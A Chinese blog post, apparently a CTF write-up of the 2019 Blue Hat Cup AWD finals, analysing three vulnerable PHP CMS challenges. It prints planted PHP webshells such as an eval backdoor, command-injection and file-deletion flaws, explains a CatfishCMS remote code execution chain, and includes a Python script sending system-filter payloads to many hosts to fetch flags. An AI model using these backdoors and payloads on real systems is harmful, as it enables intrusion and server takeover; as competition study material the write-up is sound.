<!DOCTYPE html>













<html class="theme-next muse" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.1">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo.png?v=7.1.1">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.1" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.1.1',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: true,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>


  




  <meta name="description" content="2019蓝帽杯决赛复现Write-up">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="2019蓝帽杯决赛WP">
<meta property="og:url" content="https://zo1ro.github.io/2019/08/31/blue-hat-final/index.html">
<meta property="og:site_name" content="ZO1RO">
<meta property="og:description" content="2019蓝帽杯决赛复现Write-up">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://zo1ro.github.io/2019/08/31/blue-hat-final/5.png">
<meta property="og:image" content="https://zo1ro.github.io/2019/08/31/blue-hat-final/6.png">
<meta property="og:image" content="https://zo1ro.github.io/2019/08/31/blue-hat-final/7.png">
<meta property="og:image" content="https://zo1ro.github.io/2019/08/31/blue-hat-final/3.png">
<meta property="og:image" content="https://zo1ro.github.io/2019/08/31/blue-hat-final/4.png">
<meta property="og:image" content="https://zo1ro.github.io/2019/08/31/blue-hat-final/1.png">
<meta property="og:image" content="https://zo1ro.github.io/2019/08/31/blue-hat-final/2.png">
<meta property="og:updated_time" content="2019-09-01T14:22:15.729Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2019蓝帽杯决赛WP">
<meta name="twitter:description" content="2019蓝帽杯决赛复现Write-up">
<meta name="twitter:image" content="https://zo1ro.github.io/2019/08/31/blue-hat-final/5.png">



  <link rel="alternate" href="/atom.xml" title="ZO1RO" type="application/atom+xml">



  
  
  <link rel="canonical" href="https://zo1ro.github.io/2019/08/31/blue-hat-final/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>2019蓝帽杯决赛WP | ZO1RO</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ZO1RO</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">一个向往acm的ctf_dog</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://zo1ro.github.io/2019/08/31/blue-hat-final/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ZO1RO">
      <meta itemprop="description" content="永远做好最坏的打算">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ZO1RO">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2019蓝帽杯决赛WP

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-08-31 11:31:54" itemprop="dateCreated datePublished" datetime="2019-08-31T11:31:54+08:00">2019-08-31</time>
            

            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>2019蓝帽杯决赛复现<code>Write-up</code></p>
<a id="more"></a>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>本次比赛共三道<code>WEB</code>，一道<code>PWN</code>。一开场就全场炸鸡，无法<code>ssh</code>，大约过了50分钟才修好（有些队伍早已拿到题进行审计）。时常持续三个小时，通过<code>web2</code>的后门和<code>web3</code>的流量持续拿了不少分。复现一下发现还是有所收获的。（虚拟机总是损坏，拖的比较久，用<code>window</code>搭算了）</p>
<h2 id="Web1-EBCMS-v1-1-0"><a href="#Web1-EBCMS-v1-1-0" class="headerlink" title="Web1-EBCMS-v1.1.0"></a>Web1-EBCMS-v1.1.0</h2><p><img src="5.png" alt></p>
<p>赛场上没做出来的题，赛后复现一下。</p>
<p>首先和源码<code>diff</code>一下，发现只有如下不同</p>
<p><code>app/home/controller/Api.php</code></p>
<p><img src="6.png" alt></p>
<p>贴下代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">namespace app\home\controller;</span><br><span class="line">class Api&#123;</span><br><span class="line"></span><br><span class="line">	public function captcha()&#123;</span><br><span class="line">		\mylib\Config::set(&apos;sys.show_err&apos;, \Ebcms::config(&apos;show_err&apos;, false));</span><br><span class="line">		$num = mt_rand(1, 50);</span><br><span class="line">		$max = mt_rand($num, $num + 50);</span><br><span class="line">		\mylib\Session::set(&apos;captcha&apos;, $num);</span><br><span class="line">		return \mylib\Response::image(\Captcha::create(($max-$num).&apos;+?=&apos;.$max, 16));</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	public function unserializehook()&#123;</span><br><span class="line">		if(isset($_POST[&apos;seridata&apos;]))&#123;</span><br><span class="line">			return unserialize(base64_decode($_POST[&apos;seridata&apos;]));</span><br><span class="line"></span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>app/member/controller/Api.php</code></p>
<p><img src="7.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public function imgget()&#123;</span><br><span class="line">	if(isset($_GET[&apos;ebimgname&apos;]))&#123;</span><br><span class="line">		return $this -&gt; success(base64_encode(file_get_contents($_GET[&apos;ebimgname&apos;])));</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>往下查找<code>success</code>函数定义</p>
<p><code>/extend/traits/Jump.php</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">trait Jump&#123;</span><br><span class="line">	use \traits\View;</span><br><span class="line"></span><br><span class="line">	protected function success($message=&apos;操作成功！&apos;, $url=&apos;&apos;, $data=[])&#123;</span><br><span class="line">		if (\Ebcms::isAjax()) &#123;</span><br><span class="line">			return \mylib\Response::json([</span><br><span class="line">				&apos;code&apos;=&gt;1,</span><br><span class="line">				&apos;message&apos;=&gt;$message,</span><br><span class="line">				&apos;url&apos;=&gt;$url,</span><br><span class="line">				&apos;data&apos;=&gt;$data,</span><br><span class="line">			]);</span><br><span class="line">		&#125;else&#123;</span><br><span class="line">			return $this -&gt; html($this -&gt; assign([</span><br><span class="line">				&apos;code&apos;=&gt;1,</span><br><span class="line">				&apos;message&apos;=&gt;$message,</span><br><span class="line">				&apos;url&apos;=&gt;$url,</span><br><span class="line">				&apos;data&apos;=&gt;$data,</span><br><span class="line">			]) -&gt; fetch(__DIR__ . &apos;/tpl/jump.php&apos;));</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>发现是一个回显消息的函数，并没有什么异常，猜测应该是通过该类构造一些恶意<code>payload</code>在入口处发生的反序列化漏洞，wtcl。</p>
<p>然后还找到该版本是一个<code>CNVD-2019-06644</code>。贴上链接。</p>
<p><a href="https://www.cnvd.org.cn/flaw/show/CNVD-2019-06644" target="_blank" rel="noopener">EBCMS存在任意代码执行漏洞</a></p>
<h2 id="Web2-Metinfo-6-0-0"><a href="#Web2-Metinfo-6-0-0" class="headerlink" title="Web2-Metinfo-6.0.0"></a>Web2-Metinfo-6.0.0</h2><p><img src="3.png" alt></p>
<p>这题是2018蓝帽浙江赛区的题目，但做了修改，贴个以前赛区赛题链接</p>
<p><a href="https://virtua11.github.io/2018/07/03/%E2%80%9C%E8%93%9D%E5%B8%BD%E6%9D%AF%E2%80%9D--%E7%AC%AC%E4%B8%80%E6%AC%A1AWD%E4%B9%8B%E6%97%85/" target="_blank" rel="noopener">“蓝帽杯”–第一次AWD之旅</a></p>
<p>贴个原版本代码漏洞</p>
<p><a href="https://badcode.cc/2018/05/26/Metinfo-6-0-0-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/" target="_blank" rel="noopener">Metinfo 6.0.0 任意文件读取漏洞</a></p>
<p>拉下来与本地源码对比发现，已有漏洞已被修复</p>
<p><img src="4.png" alt></p>
<p>拉下来扫描审计发现有好几个后门以及主办方修改的代码（共六个）</p>
<p><code>/about/index.php</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"># MetInfo Enterprise Content Management System</span><br><span class="line"># Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.</span><br><span class="line"></span><br><span class="line">define(&apos;M_NAME&apos;, &apos;about&apos;);</span><br><span class="line">define(&apos;M_MODULE&apos;, &apos;web&apos;);</span><br><span class="line">define(&apos;M_CLASS&apos;, &apos;about&apos;);</span><br><span class="line">define(&apos;M_ACTION&apos;, &apos;doabout&apos;);</span><br><span class="line">require_once &apos;../app/system/entrance.php&apos;;</span><br><span class="line">$e = $_REQUEST[&apos;e&apos;];</span><br><span class="line">$arr = array(&apos;test&apos;, $_REQUEST[&apos;pass&apos;]);</span><br><span class="line">uasort($arr, base64_decode($e));</span><br><span class="line"># This program is an open source system, commercial use, please consciously to purchase commercial license.</span><br><span class="line"># Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p><code>index.php</code>后门<code>@eval($_POST[&#39;a&#39;]);</code>（简单后门就不再多提）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"># MetInfo Enterprise Content Management System</span><br><span class="line"># Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.</span><br><span class="line">if(!file_exists(&apos;./config/install.lock&apos;))&#123;</span><br><span class="line">	if(file_exists(&apos;./install/index.php&apos;))&#123;</span><br><span class="line">		header(&quot;location:./install/index.php&quot;);exit;</span><br><span class="line">	&#125;</span><br><span class="line">	else&#123;</span><br><span class="line">		header(&quot;Content-type: text/html;charset=utf-8&quot;);</span><br><span class="line">		echo &quot;安装文件不存在，请上传安装文件。如已安装过，请新建config/install.lock文件。&quot;;</span><br><span class="line">		die();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">define(&apos;M_NAME&apos;, &apos;index&apos;);</span><br><span class="line">@eval($_POST[&apos;a&apos;]);</span><br><span class="line">define(&apos;M_MODULE&apos;, &apos;web&apos;);</span><br><span class="line">define(&apos;M_CLASS&apos;, &apos;index&apos;);</span><br><span class="line">define(&apos;M_ACTION&apos;, &apos;doindex&apos;);</span><br><span class="line">require_once &apos;./app/system/entrance.php&apos;;</span><br><span class="line"># This program is an open source system, commercial use, please consciously to purchase commercial license.</span><br><span class="line"># Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p><code>door.php</code>后门</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval($_POST[&apos;a&apos;]);?&gt;</span><br></pre></td></tr></table></figure>
<p><code>/admin/admin/getpassword.php</code>被修改</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">这里贴部分被修改后的关键代码</span><br><span class="line">$action = $_POST[&apos;action&apos;];</span><br><span class="line">switch($action)&#123;</span><br><span class="line">	case &apos;next1&apos;:</span><br><span class="line">		if($abt_type==1)&#123;</span><br><span class="line">			$description=$lang_password2;</span><br><span class="line">			$title=$lang_password3;</span><br><span class="line">		&#125;else&#123;</span><br><span class="line">			$description=$lang_password4;</span><br><span class="line">			$title=$lang_password5;</span><br><span class="line">		&#125;</span><br><span class="line">	break;</span><br><span class="line">	case &apos;debug&apos;:</span><br><span class="line">        $file = addslashes($_POST[&apos;file&apos;]);</span><br><span class="line">        system(&quot;find /tmp -iname &quot;.escapeshellcmd($file));</span><br><span class="line">        break;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>
<p>源码是没有取<code>$_POST[&#39;action&#39;]</code>的，这里通过<code>POST</code>取到<code>action</code>，能够进到<code>debug</code>进行文件查找。</p>
<p><code>admin/system/uploadfile.php</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">被修改后代码</span><br><span class="line">if($action==&apos;deletefolder&apos;)&#123;</span><br><span class="line">	$filedir=&quot;../../&quot;.$filename;</span><br><span class="line">    unlink($filedir);</span><br><span class="line">    metsave($rurls);</span><br><span class="line">&#125;</span><br><span class="line">原代码</span><br><span class="line">if($action==&apos;deletefolder&apos;)&#123;</span><br><span class="line">	if(strcasecmp(substr(trim($filename),0,7),&apos;upload/&apos;)!=0)die(&apos;met1&apos;);</span><br><span class="line">	if(substr_count(trim($filename),&apos;../&apos;)!=0)die(&apos;met2&apos;);</span><br><span class="line">	$filedir=&quot;../../&quot;.$filename;</span><br><span class="line">   deldir($filedir,0);</span><br><span class="line">   metsave($rurls);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到这里被修改后的代码直接导致产生任意文件删除，与源码不同的替换回去修补漏洞即可。</p>
<p><code>/include/ping.php</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line"></span><br><span class="line">	class getip&#123;</span><br><span class="line">		public $ip;</span><br><span class="line">		</span><br><span class="line">		function __construct()&#123;</span><br><span class="line">			$this-&gt;ip = &quot;127.0.0.1&quot;;</span><br><span class="line">		&#125;</span><br><span class="line">		</span><br><span class="line">		function __destruct()&#123;</span><br><span class="line">			echo &apos;The ip is&apos;.$this-&gt;ip;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">		 </span><br><span class="line">	class getresult&#123;</span><br><span class="line">		public $obj;</span><br><span class="line">		public $ip;</span><br><span class="line">		</span><br><span class="line">		function __construct()&#123;</span><br><span class="line">			$this-&gt;ip = &apos;127.0.0.1&apos;;</span><br><span class="line">			$this-&gt;obj = null;</span><br><span class="line">		&#125;</span><br><span class="line">		function __toString()&#123;</span><br><span class="line">			$this-&gt;obj-&gt;execute();</span><br><span class="line">			return $this-&gt;ip;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"> </span><br><span class="line">	class ping&#123;</span><br><span class="line">		private $ip;</span><br><span class="line">		</span><br><span class="line">		function execute()&#123;</span><br><span class="line">			$str = &apos;ping &apos;.$this-&gt;ip;</span><br><span class="line">			system($str);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	unserialize(base64_decode($_GET[&apos;ip&apos;]));</span><br><span class="line"> </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p><code>/include/curl.php</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">        if(isset($_GET[&apos;address&apos;]))&#123;</span><br><span class="line">                $address = $_GET[&apos;address&apos;];</span><br><span class="line">                if(filter_var($address,FILTER_VALIDATE_URL))&#123;</span><br><span class="line">                        $filter_url = parse_url($address);</span><br><span class="line">                        if(preg_match(&apos;/127.0.0.1/&apos;,$filter_url[&apos;host&apos;]))&#123;</span><br><span class="line">                                system(&apos;curl -v -s &apos;.$filter_url[&apos;host&apos;]);</span><br><span class="line">                        &#125;</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>这里并<code>curl.php</code>没有发现有可疑的地方（直接删除进行防护不碍事），初步猜测是在<code>ping.php</code>有个拼接命令进行执行（路由不清楚，也可以直接删除）。</p>
<p>后门exp这里不在提供，参考 <a href="http://zo1ro.tk/2019/06/23/blue-hat-2019/" target="_blank" rel="noopener">湖北赛区WP</a></p>
<h2 id="Web3-CatfishCMS-v4-8-54"><a href="#Web3-CatfishCMS-v4-8-54" class="headerlink" title="Web3-CatfishCMS-v4.8.54"></a>Web3-CatfishCMS-v4.8.54</h2><p><img src="1.png" alt="1"></p>
<p>最近爆出的一个漏洞CNVD-2019-06255</p>
<p>参考链接</p>
<p><a href="https://blog.csdn.net/yun2diao/article/details/91344725" target="_blank" rel="noopener">CatfishCMS任意命令执行导致getshell</a></p>
<p>可以看到在<code>catfish/library/think/Request.php</code>存在一个变量覆盖函数，通过重新赋值<code>method</code>和<code>$_POST</code>使函数跳转到其他函数去执行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">if (isset($_POST[Config::get(&apos;var_method&apos;)])) &#123;</span><br><span class="line">                $this-&gt;method = strtoupper($_POST[Config::get(&apos;var_method&apos;)]);</span><br><span class="line">                $this-&gt;&#123;$this-&gt;method&#125;($_POST);</span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure>
<p>查看<code>application/config.php</code>中<code>var_method</code>默认值，发现是通过<code>_method</code>参数进行赋值。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// 表单请求类型伪装变量</span><br><span class="line">    &apos;var_method&apos;             =&gt; &apos;_method&apos;,</span><br></pre></td></tr></table></figure>
<p>那么我们就可以赋值<code>_method=__construct</code>使函数跳转到<code>__construct</code>去执行，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">public function __construct($options = [])</span><br><span class="line">    &#123;</span><br><span class="line">        foreach ($options as $name =&gt; $item) &#123;</span><br><span class="line">            if (property_exists($this, $name)) &#123;</span><br><span class="line">                $this-&gt;$name = $item;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        if (is_null($this-&gt;filter)) &#123;</span><br><span class="line">            $this-&gt;filter = Config::get(&apos;default_filter&apos;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>然后通过<code>__construct</code>函数重写<code>config</code>参数值，从而<code>getshell</code>。</p>
<p>最终构成payload</p>
<p><img src="2.png" alt></p>
<p>自己跟一遍还是蛮有意思的，主要还是对之前<code>thinkPHP</code>框架的熟悉程度要更加深一些。</p>
<p>附当时写的流量exp：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">import time</span><br><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line">pattern = re.compile(&apos;key&#123;.*?&#125;&apos;)</span><br><span class="line">for i in range(3,84):</span><br><span class="line">    ips.append(i)</span><br><span class="line"></span><br><span class="line">for i in range(len(ips)):</span><br><span class="line">    ips[i]=ip % ips[i]</span><br><span class="line"></span><br><span class="line">payload = &#123;&apos;s&apos;:&apos;curl http://192.168.100.1/Getkey&apos;,&apos;_method&apos;:&apos;__construct&apos;,&apos;method&apos;:&apos;*&apos;,&quot;filter[]&quot;:&apos;system&apos;&#125;</span><br><span class="line">fake = &#123;&apos;s&apos;:&apos;curl%20http://192.168.100.1/Getkey&apos;,&apos;_method&apos;:&apos;__construct&apos;,&quot;filter[]&quot;:&apos;system&apos;&#125;</span><br><span class="line">cookie = &#123;&apos;PHPSESSID&apos;:&apos;k5obg11niv33qe5t58nb8o34h0&apos;,&apos;think_var&apos;:&apos;zh-cn&apos;&#125;</span><br><span class="line">for ip in ips:</span><br><span class="line">	print ip</span><br><span class="line">	flag = requests.post(ip,data=payload,cookies=cookie).content</span><br><span class="line">	print payload</span><br><span class="line">	flag1 = pattern.findall(flag)</span><br><span class="line">	if flag1:</span><br><span class="line">		print flag1[0]</span><br><span class="line">	requests.post(ip,data=fake)</span><br><span class="line">	requests.post(ip,data=fake)</span><br><span class="line">	requests.post(ip,data=fake)</span><br><span class="line">	requests.post(ip,data=fake)</span><br><span class="line">	requests.post(ip,data=fake)</span><br><span class="line">	time.sleep(0.1)</span><br></pre></td></tr></table></figure>
<h2 id="AWD比赛中WEB的思路总结"><a href="#AWD比赛中WEB的思路总结" class="headerlink" title="AWD比赛中WEB的思路总结"></a>AWD比赛中WEB的思路总结</h2><p>首先确定是否使用ssh弱密码，准备好修改密码的脚本（python一键执行），可进行全场抓肉机。ssh连接上去后，找到源码目录（find命令查找），备份源码（一般都有tar），拉下源码后用工具全局查找后台密码和数据库密码，然后备份数据库（mysql居多），同时用D盾等工具扫描后门，找到后门后先删除自己的后门，然后用事先写好的通打脚本全场拿分。接下来是常规流程，迅速修改后台密码，上log和waf，在代码审计的同时进行日志审计，一旦有一血产生就审计抓取到的日志，分析出可疑日志进行流量复现。</p>
<p>代码审计的思路一般是用本地存取的源码对比比赛中的源码，查找不同点，看是否存在主办方插入的漏洞点（几次比赛下来这点非常重要，有源码才能迅速定位主办方漏洞），如果完全一致，就查找该版本是否存在cve（本地记得存取相应poc）。代码审计完后不要忘记修补好漏洞点，写通打脚本全场拿分。审计代码同时不要遗忘运维的重要性，查看是否被人插入不死马，将不死马进程杀死或者写个定时任务循环删除。每一个环节都至关重要，这里不在细说。</p>
<p>还是那句话，心态要稳，这次由于<code>web</code>较多，操作有点混乱，一旦看到掉分就想着快点补回去（一轮最多400分），导致心态有点崩，还是有些心急了，吸取教训，希望以后能更沉稳一些。</p>

      
    </div>

    

    
    
    

    
      <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束 <i class="fa fa-heart"></i> 感谢阅读-------------</div>

    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
